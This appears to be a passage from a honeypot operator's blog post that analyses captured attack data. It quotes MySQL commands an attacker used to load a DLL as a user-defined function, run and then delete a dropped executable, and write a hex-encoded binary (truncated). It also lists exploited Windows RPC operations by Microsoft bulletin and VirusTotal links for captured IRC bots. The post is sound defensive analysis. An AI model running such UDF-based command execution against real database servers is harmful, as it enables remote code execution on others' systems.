create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');

For more informations, you can read this article : http://carnivore.it/2011/06/12/the_mysql_cmdshelv



RPC vulnerabilities

select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";

dcerpcservice_namedcerpcserviceop_namedcerpcserviceop_vuln
DCOMRemoteActivationMS03-26
DSSETUPDsRolerUpgradeDownlevelServerMS04-11
ISystemActivatorRemoteCreateInstanceMS04-12
MSMQQMCreateObjectInternalMS07-065
MSMQQMDeleteObjectMS05-017
NWWKSNwChangePasswordMS06-66
NWWKSNwOpenEnumNdsSubTreesMS06-66
PNPPNP_QueryResConfListMS05-39
SRVSVCNetPathCanonicalizeMS08-67
SRVSVCNetPathCompareMS08-67
WKSSVCNetAddAlternateComputerNameMS03-39
nddeapiNDdeSetTrustedShareWMS04-031



Malware URLs

select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;

All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.



Virustotal reports

select virustotal_permalink from virustotals;

http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380

All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.